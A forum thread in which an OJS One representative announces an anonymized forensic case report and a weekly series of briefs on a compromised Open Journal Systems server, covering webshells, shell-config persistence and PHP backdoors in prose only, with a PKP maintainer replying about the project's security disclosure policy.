OJSTI-CR-2026-01: Server-Side Compromise in an OJS Environment — Forensic Case Report + 9-Part Analytic Series

Oscar_OJSONE · March 17, 2026, 12:08pm

We are publishing the first case in the OJS Threat Intelligence (OJSTI) series — a full forensic analysis of a real server-side compromise in an OJS environment.

Master Report (OJSTI-CR-2026-01) Documents the complete compromise: malicious PHP components across active OJS paths, operational webshell activity, host-level persistence outside the webroot via .bashrc/.zshrc, and database contamination across 191 accounts.

Key techniques mapped to MITRE ATT&CK: T1505.003, T1059.006, T1105, T1036, T1136.

https://ojsone.com/en/resources/ojsti-case-report-2026-01-anonymized-forensic-assessment-of-ojs-server-compromise

Analytic Series — 9 briefs, weekly release Each brief dissects a specific forensic layer of the same incident:

Brief 01: Forensic Scope, Methodology and Evidence Basis https://ojsone.com/en/resources/ojsti-case-report-2026-02-forensic-scope-analytic-methodology-and-evidence-basis
Brief 02: Initial Intrusion Indicators and Early Timeline (coming next week)
Brief 03: Malicious PHP Components in OJS Environments (coming)
Brief 04: Operational Use of Webshells in HTTP Logs (coming)
Briefs 05–09: (weekly release)

All findings are anonymized. The goal is to give OJS operators, hosting providers, and institutional security teams actionable intelligence grounded in real evidence — not theory.

If you operate OJS infrastructure and have encountered similar indicators, we welcome discussion.

— Oscar Sandoval, OJS One

ojsone.com/en/cybersecurity

asmecher · March 17, 2026, 2:34pm

Hi @Oscar_OJSONE,

If you are disclosing potential vulnerabilities, please do so in accordance with our security policy:

github.com/pkp/ojs

SECURITY.md

main

# Security Policy

## Supported Versions

| Version | Supported                                             | Released      | End Of Life   | Support |
| ------- | ----------------------------------------------------- | ------------- | ------------- | :-----: |
| 3.5.x   | :hourglass:        Pre-release                        | 2025 (est)    | 2029 (est)    | LTS     |
| 3.4.x   | :heavy_check_mark: Active development                 | 2023          | 2026 (est)    |         |
| 3.3.x   | :heavy_check_mark: Active maintenance                 | 2020          | 2026 (est)    | LTS     |
| 3.2.x   | :x: Not supported                                     | 2020          | 2023          |         |
| 3.1.x   | :x: Not supported                                     | 2017          | 2022          |         |
| 3.0.x   | :x: Not supported                                     | 2016          | 2022          |         |
| 2.x     | :x: Not supported                                     | 2005          | 2021          |         |
| 1.x     | :x: Not supported                                     | 2002          | 2005 (approx) |         |

PKP usually supports current major release and the last major release.
Other releases receive bug fixes for about two years. However, that is not guaranteed.

[LTS versions](https://pkp.sfu.ca/2022/02/15/pkp-announces-long-term-support-lts-software-releases/) are an exception to this general rule, that don't include new features but receive security patches and bug fixes for 3-5 years.
At least 12 months before a LTS version reaches EOL, a new LTS version is designated, so that you have one year to perform an upgrade.

This file has been truncated. show original

I don’t see anything specific enough to be actionable by us (as maintainers of the project) or a web host in this report.

Regards,
Alec Smecher
Public Knowledge Project Team

Oscar_OJSONE · March 17, 2026, 3:18pm

Hi @asmecher,

Thank you for the response, but I think there’s a fundamental misunderstanding here.

This is not a vulnerability disclosure. No new vulnerability in OJS is being reported, and no action is being requested from PKP as software maintainer.

The report documents a real server-side compromise in a production OJS environment, focusing on attacker behavior, observed artifacts, persistence mechanisms, and operational indicators relevant to those running OJS in real conditions.

The core subject is not the software disclosure cycle — it’s the operational security of already-deployed OJS environments. These are different planes entirely.

That is precisely the gap OJS One is working to fill globally for the community: serious, actionable documentation of what a real compromise looks like in production, what signals to look for, and how to strengthen operations beyond the software itself.

I’d argue this is exactly the kind of material that should be promoted within the ecosystem, because it delivers practical value to the operators, technical teams, and hosting providers who keep OJS running in production.

— Oscar Sandoval, OJS One

Oscar_OJSONE · March 23, 2026, 12:57pm

OJSTI Series — Brief 02 now published: Initial Intrusion Indicators and Early Timeline

Brief 02 of the OJSTI-CR-2026-01 analytic series is now published.

It covers the initial intrusion indicators and early timeline of the incident — how the attacker established the first foothold and the specific signals that appeared in logs before the compromise became operationally active.

Brief 03 publishes next week: Malicious PHP Components in OJS Environments.

If you’re just joining the series:

— Master Report (full forensic assessment): https://ojsone.com/en/resources/ojsti-case-report-2026-01-anonymized-forensic-assessment-of-ojs-server-compromise
— Brief 01 (Forensic Scope & Methodology): https://ojsone.com/en/resources/ojsti-case-report-2026-02-forensic-scope-analytic-methodology-and-evidence-basis
— Brief 02 (Initial Intrusion Indicators and Early Timeline): https://ojsone.com/en/resources/ojsti-case-report-2026-03-initial-intrusion-indicators-and-early-timeline-ojs
— Full series index: ojsone.com/en/cybersecurity
The incident involved webshell deployment, host-level persistence via .bashrc/.zshrc, and database contamination across 191 accounts. All findings are anonymized. 9 briefs total, weekly release.

If you operate OJS infrastructure and have encountered similar indicators — unexpected PHP files in plugin paths, modified shell configs, anomalous HTTP log patterns — I’d welcome the discussion.

— Oscar Sandoval, OJS One

Oscar_OJSONE · March 28, 2026, 9:40pm

OJSTI Series — Brief 03 now published: Malicious PHP Components in OJS Environments

Brief 03 of the OJSTI-CR-2026-01 analytic series is now published.

It examines the malicious PHP components identified in the compromised OJS environment — not as isolated files, but as a layered server-side toolkit designed for persistence, remote control, payload refresh, and selective response manipulation.

This brief covers four main capability families:

— cloaking logic for Google-related user agents
— upload-capable webshell functionality
— duplicated file-manager backdoors with embedded authentication
— remote loaders that retrieve external payloads and execute them through eval()

The analytic value of this brief is not only in the individual artifacts, but in how they were distributed across plausible OJS-relative paths — tools, templates, locale resources, plugins, API routes, and controller paths — to blend into normal application structure while preserving operational flexibility.

If you’re just joining the series:

— Master Report (full forensic assessment): https://ojsone.com/en/resources/ojsti-case-report-2026-01-anonymized-forensic-assessment-of-ojs-server-compromise

— Brief 01 (Forensic Scope & Methodology): https://ojsone.com/en/resources/ojsti-case-report-2026-02-forensic-scope-analytic-methodology-and-evidence-basis

— Brief 02 (Initial Intrusion Indicators and Early Timeline): https://ojsone.com/en/resources/ojsti-case-report-2026-03-initial-intrusion-indicators-and-early-timeline-ojs

— Brief 03 (Malicious PHP Components in OJS Environments): https://ojsone.com/en/resources/ojsti-case-report-2026-04-malicious-php-components-in-ojs

— Full series index: ojsone.com/en/cybersecurity

This incident involved webshell deployment, host-level persistence via .bashrc/.zshrc, and database contamination across 191 accounts. All findings are anonymized. 9 briefs total, weekly release.

If you operate OJS infrastructure and have seen similar artifacts — loaders in plausible application paths, file-manager backdoors, cloaking logic, or PHP components executing remote content — I’d welcome the discussion.

— Oscar Sandoval, OJS One

Oscar_OJSONE · March 30, 2026, 1:46pm

Practical follow-up: we released a free, non-intrusive tool to detect publicly visible signals consistent with compromise in OJS sites.

It is useful for administrators, technical teams, and the broader OJS ecosystem. Direct and necessary. It does not replace forensic analysis or deeper technical review.

https://ojsone.com/en/cybersecurity

asmecher · March 30, 2026, 3:00pm

This topic was automatically closed after 13 days. New replies are no longer allowed.

Oscar_OJSONE · April 12, 2026, 11:47am

OJSTI — Brief 05 & 06 now published

Two new briefs extend the OJSTI-CR-2026-01 analysis from intrusion to sustained application-layer control.

Brief 05 — Operational use of webshells in HTTP logs
Documents how webshell activity appears as structured operator behavior within normal traffic: command execution via requests, payload chaining, and indicators of interactive control at log level.

Brief 06 — Persistence, camouflage, and path-level impersonation in OJS
Analyzes how malicious components were distributed across legitimate OJS paths — plugins, templates, controllers — to maintain persistence, evade detection, and mimic application structure.

This is not about isolated artifacts.
This is about how compromise operates and persists inside OJS environments.

Read:
https://ojsone.com/en/resources/ojsti-case-report-2026-05
https://ojsone.com/en/resources/ojsti-case-report-2026-06

asmecher · April 13, 2026, 3:00pm

This topic was automatically closed after 13 days. New replies are no longer allowed.